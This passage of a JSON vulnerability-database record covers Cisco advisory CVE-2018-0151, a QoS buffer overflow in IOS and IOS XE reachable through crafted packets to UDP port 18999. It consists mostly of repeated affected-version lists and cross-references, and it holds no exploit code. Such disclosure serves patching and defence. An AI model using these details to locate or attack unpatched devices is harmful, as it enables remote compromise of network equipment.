"cisco ios xe software"}, {"version": "3.14.2S", "operator": "eq", "name": "cisco ios xe software"}, {"version": "3.14.3S", "operator": "eq", "name": "cisco ios xe software"}, {"version": "3.14.4S", "operator": "eq", "name": "cisco ios xe software"}, {"version": "3.15.0S", "operator": "eq", "name": "cisco ios xe software"}, {"version": "3.15.1S", "operator": "eq", "name": "cisco ios xe software"}, {"version": "3.15.2S", "operator": "eq", "name": "cisco ios xe software"}, {"version": "3.15.1cS", "operator": "eq", "name": "cisco ios xe software"}, {"version": "3.15.3S", "operator": "eq", "name": "cisco ios xe software"}, {"version": "3.15.4S", "operator": "eq", "name": "cisco ios xe software"}, {"version": "3.16.0S", "operator": "eq", "name": "cisco ios xe software"}, {"version": "3.16.1S", "operator": "eq", "name": "cisco ios xe software"}, {"version": "3.16.0aS", "operator": "eq", "name": "cisco ios xe software"}, {"version": "3.16.1aS", "operator": "eq", "name": "cisco ios xe software"}, {"version": "3.16.2S", "operator": "eq", "name": "cisco ios xe software"}, {"version": "3.16.2aS", "operator": "eq", "name": "cisco ios xe software"}, {"version": "3.16.0bS", "operator": "eq", "name": "cisco ios xe software"}, {"version": "3.16.0cS", "operator": "eq", "name": "cisco ios xe software"}, {"version": "3.16.3S", "operator": "eq", "name": "cisco ios xe software"}, {"version": "3.16.2bS", "operator": "eq", "name": "cisco ios xe software"}, {"version": "3.16.3aS", "operator": "eq", "name": "cisco ios xe software"}, {"version": "3.16.4S", "operator": "eq", "name": "cisco ios xe software"}, {"version": "3.16.4aS", "operator": "eq", "name": "cisco ios xe software"}, {"version": "3.16.4bS", "operator": "eq", "name": "cisco ios xe software"}, {"version": "3.16.4gS", "operator": "eq", "name": "cisco ios xe software"}, {"version": "3.16.5S", "operator": "eq", "name": "cisco ios xe software"}, {"version": "3.16.4cS", "operator": "eq", "name": "cisco ios xe software"}, {"version": "3.16.4dS", "operator": "eq", "name": "cisco ios xe software"}, {"version": "3.16.4eS", "operator": "eq", "name": "cisco ios xe software"}, {"version": "3.16.6S", "operator": "eq", "name": "cisco ios xe software"}, {"version": "3.16.5aS", "operator": "eq", "name": "cisco ios xe software"}, {"version": "3.16.5bS", "operator": "eq", "name": "cisco ios xe software"}, {"version": "3.16.6bS", "operator": "eq", "name": "cisco ios xe software"}, {"version": "3.17.0S", "operator": "eq", "name": "cisco ios xe software"}, {"version": "3.17.1S", "operator": "eq", "name": "cisco ios xe software"}, {"version": "3.17.2S", "operator": "eq", "name": "cisco ios xe software"}, {"version": "3.17.1aS", "operator": "eq", "name": "cisco ios xe software"}, {"version": "3.17.3S", "operator": "eq", "name": "cisco ios xe software"}, {"version": "3.17.4S", "operator": "eq", "name": "cisco ios xe software"}, {"version": "16.1.1", "operator": "eq", "name": "cisco ios xe software"}, {"version": "16.1.2", "operator": "eq", "name": "cisco ios xe software"}, {"version": "16.1.3", "operator": "eq", "name": "cisco ios xe software"}, {"version": "16.2.1", "operator": "eq", "name": "cisco ios xe software"}, {"version": "16.2.2", "operator": "eq", "name": "cisco ios xe software"}, {"version": "16.3.1", "operator": "eq", "name": "cisco ios xe software"}, {"version": "16.3.2", "operator": "eq", "name": "cisco ios xe software"}, {"version": "16.3.3", "operator": "eq", "name": "cisco ios xe software"}, {"version": "16.3.1a", "operator": "eq", "name": "cisco ios xe software"}, {"version": "16.3.4", "operator": "eq", "name": "cisco ios xe software"}, {"version": "16.3.5", "operator": "eq", "name": "cisco ios xe software"}, {"version": "16.3.5b", "operator": "eq", "name": "cisco ios xe software"}, {"version": "16.4.1", "operator": "eq", "name": "cisco ios xe software"}, {"version": "16.4.2", "operator": "eq", "name": "cisco ios xe software"}, {"version": "16.5.1", "operator": "eq", "name": "cisco ios xe software"}, {"version": "16.5.1a", "operator": "eq", "name": "cisco ios xe software"}, {"version": "16.5.1b", "operator": "eq", "name": "cisco ios xe software"}, {"version": "16.5.2", "operator": "eq", "name": "cisco ios xe software"}, {"version": "3.18.0aS", "operator": "eq", "name": "cisco ios xe software"}, {"version": "3.18.0S", "operator": "eq", "name": "cisco ios xe software"}, {"version": "3.18.1S", "operator": "eq", "name": "cisco ios xe software"}, {"version": "3.18.2S", "operator": "eq", "name": "cisco ios xe software"}, {"version": "3.18.3S", "operator": "eq", "name": "cisco ios xe software"}, {"version": "3.18.4S", "operator": "eq", "name": "cisco ios xe software"}, {"version": "3.18.0SP", "operator": "eq", "name": "cisco ios xe software"}, {"version": "3.18.1SP", "operator": "eq", "name": "cisco ios xe software"}, {"version": "3.18.1aSP", "operator": "eq", "name": "cisco ios xe software"}, {"version": "3.18.1gSP", "operator": "eq", "name": "cisco ios xe software"}, {"version": "3.18.1bSP", "operator": "eq", "name": "cisco ios xe software"}, {"version": "3.18.1cSP", "operator": "eq", "name": "cisco ios xe software"}, {"version": "3.18.2SP", "operator": "eq", "name": "cisco ios xe software"}, {"version": "3.18.1hSP", "operator": "eq", "name": "cisco ios xe software"}, {"version": "3.18.2aSP", "operator": "eq", "name": "cisco ios xe software"}, {"version": "3.18.1iSP", "operator": "eq", "name": "cisco ios xe software"}, {"version": "3.18.3SP", "operator": "eq", "name": "cisco ios xe software"}, {"version": "3.18.3aSP", "operator": "eq", "name": "cisco ios xe software"}, {"version": "16.6.1", "operator": "eq", "name": "cisco ios xe software"}], "vendorCvss": {}}, "lastseen": "2021-07-28T16:27:25", "differentElements": ["affectedSoftware"], "edition": 7}, {"bulletin": {"id": "CISCO-SA-20180328-QOS", "hash": "1328081fea41aedcd47a268e4a86419c", "type": "cisco", "bulletinFamily": "software", "title": "Cisco IOS and IOS XE Software Quality of Service Remote Code Execution Vulnerability", "description": "A vulnerability in the quality of service (QoS) subsystem of Cisco IOS Software and Cisco IOS XE Software could allow an unauthenticated, remote attacker to cause a denial of service (DoS) condition or execute arbitrary code with elevated privileges.\n\nThe vulnerability is due to incorrect bounds checking of certain values in packets that are destined for UDP port 18999 of an affected device. An attacker could exploit this vulnerability by sending malicious packets to an affected device. When the packets are processed, an exploitable buffer overflow condition may occur. A successful exploit could allow the attacker to execute arbitrary code on the affected device with elevated privileges. The attacker could also leverage this vulnerability to cause the device to reload, causing a temporary DoS condition while the device is reloading.\n\nThe malicious packets must be destined to and processed by an affected device. Traffic transiting a device will not trigger the vulnerability.\n\nCisco has released software updates that address this vulnerability. There are workarounds for most affected Cisco products that address this vulnerability.\n\nThis advisory is available at the following link:\nhttps://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180328-qos [\"https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180328-qos\"]\nThis advisory is part of the March 28, 2018, release of the Cisco IOS and IOS XE Software Security Advisory Bundled Publication, which includes 20 Cisco Security Advisories that describe 22 vulnerabilities. For a complete list of the advisories and links to them, see Cisco Event Response: March 2018 Semiannual Cisco IOS and IOS XE Software Security Advisory Bundled Publication [\"https://tools.cisco.com/security/center/viewErp.x?alertId=ERP-66682\"].", "published": "2018-03-28T16:00:00", "modified": "2018-04-27T21:15:15", "cvss": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "cvss2": {}, "cvss3": {}, "href": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180328-qos", "reporter": "Cisco", "references": ["https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180328-qos"], "cvelist": ["CVE-2018-0151"], "immutableFields": [], "lastseen": "2021-09-01T10:28:19", "history": [], "viewCount": 261, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2018-0151"]}, {"type": "nessus", "idList": ["720296.PRM", "CISCO-SA-20180328-QOS-IOS.NASL", "CISCO-SA-20180328-QOS-IOSXE.NASL"]}, {"type": "threatpost", "idList": ["THREATPOST:B7DF4F28933004E3E4D52762786306C4"]}, {"type": "myhack58", "idList": ["MYHACK58:62201889900"]}, {"type": "ics", "idList": ["ICSA-18-107-03"]}, {"type": "cisco", "idList": ["CISCO-SA-20180328-QOS"]}], "modified": "2021-09-01T10:28:19", "rev": 2}, "score": {"value": 8.5, "vector": "NONE", "modified": "2021-09-01T10:28:19", "rev": 2}}, "objectVersion": "1.6", "affectedSoftware": [{"version": "15.5S", "operator": "eq", "name": "ios"}, {"version": "15.5T", "operator": "eq", "name": "ios"}, {"version": "15.5M", "operator": "eq", "name": "ios"}, {"version": "15.5SN", "operator": "eq", "name": "ios"}, {"version": "15.6S", "operator": "eq", "name": "ios"}, {"version": "15.6T", "operator": "eq", "name": "ios"}, {"version": "15.6SP", "operator": "eq", "name": "ios"}, {"version": "15.6SN", "operator": "eq", "name": "ios"}, {"version": "15.6M", "operator": "eq", "name": "ios"}, {"version": "15.7M", "operator": "eq", "name": "ios"}, {"version": "15.3JK", "operator": "eq", "name": "ios"}, {"version": "3.14S", "operator": "eq", "name": "cisco ios xe software"}, {"version": "3.15S", "operator": "eq", "name": "cisco ios xe software"}, {"version": "3.16S", "operator": "eq", "name": "cisco ios xe software"}, {"version": "3.17S", "operator": "eq", "name": "cisco ios xe software"}, {"version": "16.1", "operator": "eq", "name": "cisco ios xe software"}, {"version": "16.2", "operator": "eq", "name": "cisco ios xe software"}, {"version": "16.3", "operator": "eq", "name": "cisco ios xe software"}, {"version": "16.4", "operator": "eq", "name": "cisco ios xe software"}, {"version": "16.5", "operator": "eq", "name": "cisco ios xe software"}, {"version": "3.18S", "operator": "eq", "name": "cisco ios xe software"}, {"version": "3.18SP", "operator": "eq", "name": "cisco ios xe software"}, {"version": "16.6", "operator": "eq", "name": "cisco ios xe software"}, {"version": "15.5(1)S", "operator": "eq", "name": "cisco ios"}, {"version": "15.5(2)S", "operator": "eq", "name": "cisco ios"}, {"version": "15.5(1)S1", "operator": "eq", "name": "cisco ios"}, {"version": "15.5(3)S", "operator": "eq", "name": "cisco ios"}, {"version": "15.5(1)S2", "operator": "eq", "name": "cisco ios"}, {"version": "15.5(1)S3", "operator": "eq", "name": "cisco ios"}, {"version": "15.5(2)S1", "operator": "eq", "name": "cisco ios"}, {"version": "15.5(2)S2", "operator": "eq", "name": "cisco ios"}, {"version": "15.5(3)S1", "operator": "eq", "name": "cisco ios"}, {"version": "15.5(3)S1a", "operator": "eq", "name": "cisco ios"}, {"version": "15.5(2)S3", "operator": "eq", "name": "cisco ios"}, {"version": "15.5(3)S2", "operator": "eq", "name": "cisco ios"}, {"version": "15.5(3)S0a", "operator": "eq", "name": "cisco ios"}, {"version": "15.5(3)S3", "operator": "eq", "name": "cisco ios"}, {"version": "15.5(1)S4", "operator": "eq", "name": "cisco ios"}, {"version": "15.5(2)S4", "operator": "eq", "name": "cisco ios"}, {"version": "15.5(3)S4", "operator": "eq", "name": "cisco ios"}, {"version": "15.5(3)S5", "operator": "eq", "name": "cisco ios"}, {"version": "15.5(3)S6", "operator": "eq", "name": "cisco ios"}, {"version": "15.5(3)S6a", "operator": "eq", "name": "cisco ios"}, {"version": "15.5(3)S6b", "operator": "eq", "name": "cisco ios"}, {"version": "15.5(1)T", "operator": "eq", "name": "cisco ios"}, {"version": "15.5(2)T", "operator": "eq", "name": "cisco ios"}, {"version": "15.5(1)T3", "operator": "eq", "name": "cisco ios"}, {"version": "15.5(2)T1", "operator": "eq", "name": "cisco ios"}, {"version": "15.5(2)T2", "operator": "eq", "name": "cisco ios"}, {"version": "15.5(2)T3", "operator": "eq", "name": "cisco ios"}, {"version": "15.5(2)T4", "operator": "eq", "name": "cisco ios"}, {"version": "15.5(1)T4", "operator": "eq", "name": "cisco ios"}, {"version": "15.5(3)M", "operator": "eq", "name": "cisco ios"}, {"version": "15.5(3)M1", "operator": "eq", "name": "cisco ios"}, {"version": "15.5(3)M0a", "operator": "eq", "name": "cisco ios"}, {"version": "15.5(3)M2", "operator": "eq", "name": "cisco ios"}, {"version": "15.5(3)M2a", "operator": "eq", "name": "cisco ios"}, {"version": "15.5(3)M3", "operator": "eq", "name": "cisco ios"}, {"version": "15.5(3)M4", "operator": "eq", "name": "cisco ios"}, {"version": "15.5(3)M4a", "operator": "eq", "name": "cisco ios"}, {"version": "15.5(3)M5", "operator": "eq", "name": "cisco ios"}, {"version": "15.5(3)M4b", "operator": "eq", "name": "cisco ios"}, {"version": "15.5(3)M4c", "operator": "eq", "name": "cisco ios"}, {"version": "15.5(3)M6", "operator": "eq", "name": "cisco ios"}, {"version": "15.5(3)M6a", "operator": "eq", "name": "cisco ios"}, {"version": "15.5(1)SN", "operator": "eq", "name": "cisco ios"}, {"version": "15.5(1)SN1", "operator": "eq", "name": "cisco ios"}, {"version": "15.5(2)SN", "operator": "eq", "name": "cisco ios"}, {"version": "15.5(3)SN0a", "operator": "eq", "name": "cisco ios"}, {"version": "15.5(3)SN", "operator": "eq", "name": "cisco ios"}, {"version": "15.6(1)S", "operator": "eq", "name": "cisco ios"}, {"version": "15.6(2)S", "operator": "eq", "name": "cisco ios"}, {"version": "15.6(2)S1", "operator": "eq", "name": "cisco ios"}, {"version": "15.6(1)S1", "operator": "eq", "name": "cisco ios"}, {"version": "15.6(1)S2", "operator": "eq", "name": "cisco ios"}, {"version": "15.6(2)S2", "operator": "eq", "name": "cisco ios"}, {"version": "15.6(1)S3", "operator": "eq", "name": "cisco ios"}, {"version": "15.6(2)S3", "operator": "eq", "name": "cisco ios"}, {"version": "15.6(1)S4", "operator": "eq", "name": "cisco ios"}, {"version": "15.6(2)S4", "operator": "eq", "name": "cisco ios"}, {"version": "15.6(1)T", "operator": "eq", "name": "cisco ios"}, {"version": "15.6(2)T", "operator": "eq", "name": "cisco ios"}, {"version": "15.6(1)T0a", "operator": "eq", "name": "cisco ios"}, {"version": "15.6(1)T1", "operator": "eq", "name": "cisco ios"}, {"version": "15.6(2)T1", "operator": "eq", "name": "cisco ios"}, {"version": "15.6(1)T2", "operator": "eq", "name": "cisco ios"}, {"version": "15.6(2)T0a", "operator": "eq", "name": "cisco ios"}, {"version": "15.6(2)T2", "operator": "eq", "name": "cisco ios"}, {"version": "15.6(1)T3", "operator": "eq", "name": "cisco ios"}, {"version": "15.6(2)T3", "operator": "eq", "name": "cisco ios"}, {"version": "15.6(2)SP", "operator": "eq", "name": "cisco ios"}, {"version": "15.6(2)SP1", "operator": "eq", "name": "cisco ios"}, {"version": "15.6(2)SP2", "operator": "eq", "name": "cisco ios"}, {"version": "15.6(2)SP3", "operator": "eq", "name": "cisco ios"}, {"version": "15.6(1)SN", "operator": "eq", "name": "cisco ios"}, {"version": "15.6(1)SN1", "operator": "eq", "name": "cisco ios"}, {"version": "15.6(2)SN", "operator": "eq", "name": "cisco ios"}, {"version": "15.6(1)SN2", "operator": "eq", "name": "cisco ios"}, {"version": "15.6(1)SN3", "operator": "eq", "name": "cisco ios"}, {"version": "15.6(3)SN", "operator": "eq", "name": "cisco ios"}, {"version": "15.6(4)SN", "operator": "eq", "name": "cisco ios"}, {"version": "15.6(5)SN", "operator": "eq", "name": "cisco ios"}, {"version": "15.6(6)SN", "operator": "eq", "name": "cisco ios"}, {"version": "15.6(7)SN", "operator": "eq", "name": "cisco ios"}, {"version": "15.6(7)SN1", "operator": "eq", "name": "cisco ios"}, {"version": "15.6(7)SN2", "operator": "eq", "name": "cisco ios"}, {"version": "15.6(7)SN3", "operator": "eq", "name": "cisco ios"}, {"version": "15.6(3)M", "operator": "eq", "name": "cisco ios"}, {"version": "15.6(3)M1", "operator": "eq", "name": "cisco ios"}, {"version": "15.6(3)M0a", "operator": "eq", "name": "cisco ios"}, {"version": "15.6(3)M1a", "operator": "eq", "name": "cisco ios"}, {"version": "15.6(3)M1b", "operator": "eq", "name": "cisco ios"}, {"version": "15.6(3)M2", "operator": "eq", "name": "cisco ios"}, {"version": "15.6(3)M2a", "operator": "eq", "name": "cisco ios"}, {"version": "15.6(3)M3", "operator": "eq", "name": "cisco ios"}, {"version": "15.6(3)M3a", "operator": "eq", "name": "cisco ios"}, {"version": "15.7(3)M", "operator": "eq", "name": "cisco ios"}, {"version": "15.7(3)M0a", "operator": "eq", "name": "cisco ios"}, {"version": "15.3(3)JK6", "operator": "eq", "name": "cisco ios"}, {"version": "3.14.0S", "operator": "eq", "name": "cisco ios xe software"}, {"version": "3.14.1S", "operator": "eq", "name": "cisco ios xe software"}, {"version": "3.14.2S", "operator": "eq", "name": "cisco ios xe software"}, {"version": "3.14.3S", "operator": "eq", "name": "cisco ios xe software"}, {"version": "3.14.4S", "operator": "eq", "name": "cisco ios xe software"}, {"version": "3.15.0S", "operator": "eq", "name": "cisco ios xe software"}, {"version": "3.15.1S", "operator": "eq", "name": "cisco ios xe software"}, {"version": "3.15.2S", "operator": "eq", "name": "cisco ios xe software"}, {"version": "3.15.1cS", "operator": "eq", "name": "cisco ios xe software"}, {"version": "3.15.3S", "operator": "eq", "name": "cisco ios xe software"}, {"version": "3.15.4S", "operator": "eq", "name": "cisco ios xe software"}, {"version": "3.16.0S", "operator": "eq", "name": "cisco ios xe software"}, {"version": "3.16.1S", "operator": "eq", "name": "cisco ios xe software"}, {"version": "3.16.0aS", "operator": "eq", "name": "cisco ios xe software"}, {"version": "3.16.1aS", "operator": "eq", "name": "cisco ios xe software"}, {"version": "3.16.2S", "operator": "eq", "name": "cisco ios xe software"}, {"version": "3.16.2aS", "operator": "eq", "name": "cisco ios xe software"}, {"version": "3.16.0bS", "operator": "eq", "name": "cisco ios xe software"}, {"version": "3.16.0cS", "operator": "eq", "name": "cisco ios xe software"}, {"version": "3.16.3S", "operator": "eq", "name": "cisco ios xe software"}, {"version": "3.16.2bS", "operator": "eq", "name": "cisco ios xe software"}, {"version": "3.16.3aS", "operator": "eq", "name": "cisco ios xe software"}, {"version": "3.16.4S", "operator": "eq", "name": "cisco ios xe software"}, {"version": "3.16.4aS", "operator": "eq", "name": "cisco ios xe software"}, {"version": "3.16.4bS", "operator": "eq", "name": "cisco ios xe software"}, {"version": "3.16.4gS", "operator": "eq", "name": "cisco ios xe software"}, {"version": "3.16.5S", "operator": "eq", "name": "cisco ios xe software"}, {"version": "3.16.4cS", "operator": "eq", "name": "cisco ios xe software"}, {"version": "3.16.4dS", "operator": "eq", "name": "cisco ios xe software"}, {"version": "3.16.4eS", "operator": "eq", "name": "cisco ios xe software"}, {"version": "3.16.6S", "operator": "eq", "name": "cisco ios xe software"}, {"version": "3.16.5aS", "operator": "eq", "name": "cisco ios xe software"}, {"version": "3.16.5bS", "operator": "eq", "name": "cisco ios xe software"}, {"version": "3.16.6bS", "operator": "eq", "name": "cisco ios xe software"}, {"version": "3.17.0S", "operator": "eq", "name": "cisco ios xe software"}, {"version": "3.17.1S", "operator": "eq", "name": "cisco ios xe software"}, {"version": "3.17.2S", "operator": "eq", "name": "cisco ios xe software"}, {"version": "3.17.1aS", "operator": "eq", "name": "cisco ios xe software"}, {"version": "3.17.3S", "operator": "eq", "name": "cisco ios xe software"}, {"version": "3.17.4S", "operator": "eq", "name": "cisco ios xe software"}, {"version": "16.1.1", "operator": "eq", "name": "cisco ios xe software"}, {"version": "16.1.2", "operator": "eq", "name": "cisco ios xe software"}, {"version": "16.1.3", "operator": "eq", "name": "cisco ios xe software"}, {"version": "16.2.1", "operator": "eq", "name": "cisco ios xe software"}, {"version": "16.2.2", "operator": "eq", "name": "cisco ios xe software"}, {"version": "16.3.1", "operator": "eq", "name": "cisco ios xe software"}, {"version": "16.3.2", "operator": "eq", "name": "cisco ios xe software"}, {"version": "16.3.3", "operator": "eq", "name": "cisco ios xe software"}, {"version": "16.3.1a", "operator": "eq", "name": "cisco ios xe software"}, {"version": "16.3.4", "operator": "eq", "name": "cisco ios xe software"}, {"version": "16.3.5", "operator": "eq", "name": "cisco ios xe software"}, {"version": "16.3.5b", "operator": "eq", "name": "cisco ios xe software"}, {"version": "16.4.1", "operator": "eq", "name": "cisco ios xe software"}, {"version": "16.4.2", "operator": "eq", "name": "cisco ios xe software"}, {"version": "16.5.1", "operator": "eq", "name": "cisco ios xe software"}, {"version": "16.5.1a", "operator": "eq", "name": "cisco ios xe software"}, {"version": "16.5.1b", "operator": "eq", "name": "cisco ios xe software"}, {"version": "16.5.2", "operator": "eq", "name": "cisco ios xe software"}, {"version": "3.18.0aS", "operator": "eq", "name": "cisco ios xe software"}, {"version": "3.18.0S", "operator": "eq", "name": "cisco ios xe software"}, {"version": "3.18.1S", "operator": "eq", "name": "cisco ios xe software"}, {"version": "3.18.2S", "operator": "eq", "name": "cisco ios xe software"}, {"version": "3.18.3S", "operator": "eq", "name": "cisco ios xe software"}, {"version": "3.18.4S", "operator": "eq", "name": "cisco ios xe software"}, {"version": "3.18.0SP", "operator": "eq", "name": "cisco ios xe software"}, {"version": "3.18.1SP", "operator": "eq", "name": "cisco ios xe software"}, {"version": "3.18.1aSP", "operator": "eq", "name": "cisco ios xe software"}, {"version": "3.18.1gSP", "operator": "eq", "name": "cisco ios xe software"}, {"version": "3.18.1bSP", "operator": "eq", "name": "cisco ios xe software"}, {"version": "3.18.1cSP", "operator": "eq", "name": "cisco ios xe software"}, {"version": "3.18.2SP", "operator": "eq", "name": "cisco ios xe software"}, {"version": "3.18.1hSP", "operator": "eq", "name": "cisco ios xe software"}, {"version": "3.18.2aSP", "operator": "eq", "name": "cisco ios xe software"}, {"version": "3.18.1iSP", "operator": "eq", "name": "cisco ios xe software"}, {"version": "3.18.3SP", "operator": "eq", "name": "cisco ios xe software"}, {"version": "3.18.3aSP", "operator": "eq", "name": "cisco ios xe software"}, {"version": "16.6.1", "operator": "eq", "name": "cisco ios xe software"}], "vendorCvss": {}}, "lastseen": "2021-09-01T10:28:19", "differentElements": ["vendorCvss"], "edition": 8}], "viewCount": 261, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2018-0151"]}, {"type": "nessus", "idList": ["CISCO-SA-20180328-QOS-IOSXE.NASL", "CISCO-SA-20180328-QOS-IOS.NASL", "720296.PRM"]}, {"type": "threatpost", "idList": ["THREATPOST:B7DF4F28933004E3E4D52762786306C4"]}, {"type": "myhack58", "idList": ["MYHACK58:62201889900"]}, {"type": "ics", "idList": ["ICSA-18-107-03"]}, {"type": "cisco", "idList": ["CISCO-SA-20180328-QOS"]}], "modified": "2021-09-02T22:32:55", "rev": 2}, "score": {"value": 8.5, "vector": "NONE", "modified": "2021-09-02T22:32:55", "rev": 2}}, "objectVersion": "1.6", "affectedSoftware": [{"version": "15.5S", "operator": "eq", "name": "ios"}, {"version": "15.5T", "operator": "eq", "name": "ios"}, {"version": "15.5M", "operator": "eq", "name": "ios"}, {"version": "15.5SN", "operator": "eq", "name": "ios"}, {"version": "15.6S", "operator": "eq", "name": "ios"}, {"version": "15.6T", "operator": "eq", "name": "ios"}, {"version": "15.6SP", "operator": "eq", "name": "ios"}, {"version": "15.6SN", "operator": "eq", "name": "ios"}, {"version": "15.6M", "operator": "eq", "name": "ios"}, {"version": "15.7M", "operator": "eq", "name": "ios"}, {"version": "15.3JK", "operator": "eq", "name": "ios"}, {"version": "3.14S", "operator": "eq", "name": "cisco ios xe software"}, {"version": "3.15S", "operator": "eq", "name": "cisco ios xe software"}, {"version": "3.16S", "operator": "eq", "name": "cisco ios xe software"}, {"version": "3.17S", "operator": "eq", "name": "cisco ios xe software"}, {"version": "16.1", "operator": "eq", "name": "cisco ios xe software"}, {"version": "16.2", "operator": "eq", "name": "cisco ios xe software"}, {"version": "16.3", "operator": "eq", "name": "cisco ios xe software"}, {"version": "16.4", "operator": "eq", "name": "cisco ios xe software"}, {"version": "16.5", "operator": "eq", "name": "cisco ios xe software"}, {"version": "3.18S", "operator": "eq", "name": "cisco ios xe software"}, {"version": "3.18SP", "operator": "eq", "name": "cisco ios xe software"}, {"version": "16.6", "operator": "eq", "name": "cisco ios xe software"}, {"version": "15.5(1)S", "operator": "eq", "name": "cisco ios"}, {"version": "15.5(2)S", "operator": "eq", "name": "cisco ios"}, {"version": "15.5(1)S1", "operator": "eq", "name": "cisco ios"}, {"version": "15.5(3)S", "operator": "eq", "name": "cisco ios"}, {"version": "15.5(1)S2", "operator": "eq", "name": "cisco ios"}, {"version": "15.5(1)S3", "operator": "eq", "name": "cisco ios"}, {"version": "15.5(2)S1", "operator": "eq", "name": "cisco ios"}, {"version": "15.5(2)S2", "operator": "eq", "name": "cisco ios"}, {"version": "15.5(3)S1", "operator": "eq", "name": "cisco ios"}, {"version": "15.5(3)S1a", "operator": "eq", "name": "cisco ios"}, {"version": "15.5(2)S3", "operator": "eq", "name": "cisco ios"}, {"version": "15.5(3)S2", "operator": "eq", "name": "cisco ios"}, {"version": "15.5(3)S0a", "operator": "eq", "name": "cisco ios"}, {"version": "15.5(3)S3", "operator": "eq", "name": "cisco ios"}, {"version": "15.5(1)S4", "operator": "eq", "name": "cisco ios"}, {"version": "15.5(2)S4", "operator": "eq", "name": "cisco ios"}, {"version": "15.5(3)S4", "operator": "eq", "name": "cisco ios"}, {"version": "15.5(3)S5", "operator": "eq", "name": "cisco ios"}, {"version": "15.5(3)S6", "operator": "eq", "name": "cisco ios"}, {"version": "15.5(3)S6a", "operator": "eq", "name": "cisco ios"}, {"version": "15.5(3)S6b", "operator": "eq", "name": "cisco ios"}, {"version": "15.5(1)T", "operator": "eq", "name": "cisco ios"}, {"version": "15.5(2)T", "operator": "eq", "name": "cisco ios"}, {"version": "15.5(1)T3", "operator": "eq", "name": "cisco ios"}, {"version": "15.5(2)T1", "operator": "eq", "name": "cisco ios"}, {"version": "15.5(2)T2", "operator": "eq", "name": "cisco ios"}, {"version": "15.5(2)T3", "operator": "eq", "name": "cisco ios"}, {"version": "15.5(2)T4", "operator": "eq", "name": "cisco ios"}, {"version": "15.5(1)T4", "operator": "eq", "name": "cisco ios"}, {"version": "15.5(3)M", "operator": "eq", "name": "cisco ios"}, {"version": "15.5(3)M1", "operator": "eq", "name": "cisco ios"}, {"version": "15.5(3)M0a", "operator": "eq", "name": "cisco ios"}, {"version": "15.5(3)M2", "operator": "eq", "name": "cisco ios"}, {"version": "15.5(3)M2a", "operator": "eq", "name": "cisco ios"}, {"version": "15.5(3)M3", "operator": "eq", "name": "cisco ios"}, {"version": "15.5(3)M4", "operator": "eq", "name": "cisco ios"}, {"version": "15.5(3)M4a", "operator": "eq", "name": "cisco ios"}, {"version": "15.5(3)M5", "operator": "eq", "name": "cisco ios"}, {"version": "15.5(3)M4b", "operator": "eq", "name": "cisco ios"}, {"version": "15.5(3)M4c", "operator": "eq", "name": "cisco ios"}, {"version": "15.5(3)M6", "operator": "eq", "name": "cisco ios"}, {"version": "15.5(3)M6a", "operator": "eq", "name": "cisco ios"}, {"version": "15.5(1)SN", "operator": "eq", "name": "cisco ios"}, {"version": "15.5(1)SN1", "operator": "eq", "name": "cisco ios"}, {"version": "15.5(2)SN", "operator": "eq", "name": "cisco ios"}, {"version": "15.5(3)SN0a", "operator": "eq", "name": "cisco ios"}, {"version": "15.5(3)SN", "operator": "eq", "name": "cisco ios"}, {"version": "15.6(1)S", "operator": "eq", "name": "cisco ios"}, {"version": "15.6(2)S", "operator": "eq", "name": "cisco ios"}, {"version": "15.6(2)S1", "operator": "eq", "name": "cisco ios"}, {"version": "15.6(1)S1", "operator": "eq", "name": "cisco ios"}, {"version": "15.6(1)S2", "operator": "eq", "name": "cisco ios"}, {"version": "15.6(2)S2", "operator": "eq", "name": "cisco ios"}, {"version": "15.6(1)S3", "operator": "eq", "name": "cisco ios"}, {"version": "15.6(2)S3", "operator": "eq", "name": "cisco ios"}, {"version": "15.6(1)S4", "operator": "eq", "name": "cisco ios"}, {"version": "15.6(2)S4", "operator": "eq", "name": "cisco ios"}, {"version": "15.6(1)T", "operator": "eq", "name": "cisco ios"}, {"version": "15.6(2)T", "operator": "eq", "name": "cisco ios"}, {"version": "15.6(1)T0a", "operator": "eq", "name": "cisco ios"}, {"version": "15.6(1)T1", "operator": "eq", "name": "cisco ios"}, {"version": "15.6(2)T1", "operator": "eq", "name": "cisco ios"}, {"version": "15.6(1)T2", "operator": "eq", "name": "cisco ios"}, {"version": "15.6(2)T0a", "operator": "eq", "name": "cisco ios"}, {"version": "15.6(2)T2", "operator": "eq", "name": "cisco ios"}, {"version": "15.6(1)T3", "operator": "eq", "name": "cisco ios"}, {"version": "15.6(2)T3", "operator": "eq", "name": "cisco ios"}, {"version": "15.6(2)SP", "operator": "eq", "name": "cisco ios"}, {"version": "15.6(2)SP1", "operator": "eq", "name": "cisco ios"}, {"version": "15.6(2)SP2", "operator": "eq", "name": "cisco ios"}, {"version": "15.6(2)SP3", "operator": "eq", "name": "cisco ios"}, {"version": "15.6(1)SN", "operator": "eq", "name": "cisco ios"}, {"version": "15.6(1)SN1", "operator": "eq", "name": "cisco ios"}, {"version": "15.6(2)SN", "operator": "eq", "name": "cisco ios"}, {"version": "15.6(1)SN2", "operator": "eq", "name": "cisco ios"}, {"version": "15.6(1)SN3", "operator": "eq", "name": "cisco ios"}, {"version": "15.6(3)SN", "operator": "eq", "name": "cisco ios"}, {"version": "15.6(4)SN", "operator": "eq", "name": "cisco ios"}, {"version": "15.6(5)SN", "operator": "eq", "name": "cisco ios"}, {"version": "15.6(6)SN", "operator": "eq", "name": "cisco ios"}, {"version": "15.6(7)SN", "operator": "eq", "name": "cisco ios"}, {"version": "15.6(7)SN1", "operator": "eq", "name": "cisco ios"}, {"version": "15.6(7)SN2", "operator": "eq", "name": "cisco ios"}, {"version": "15.6(7)SN3", "operator": "eq", "name": "cisco ios"}, {"version": "15.6(3)M", "operator": "eq", "name": "cisco ios"}, {"version": "15.6(3)M1", "operator": "eq", "name": "cisco ios"}, {"version": "15.6(3)M0a", "operator": "eq", "name": "cisco ios"}, {"version": "15.6(3)M1a", "operator": "eq", "name": "cisco ios"}, {"version": "15.6(3)M1b", "operator": "eq", "name": "cisco ios"}, {"version": 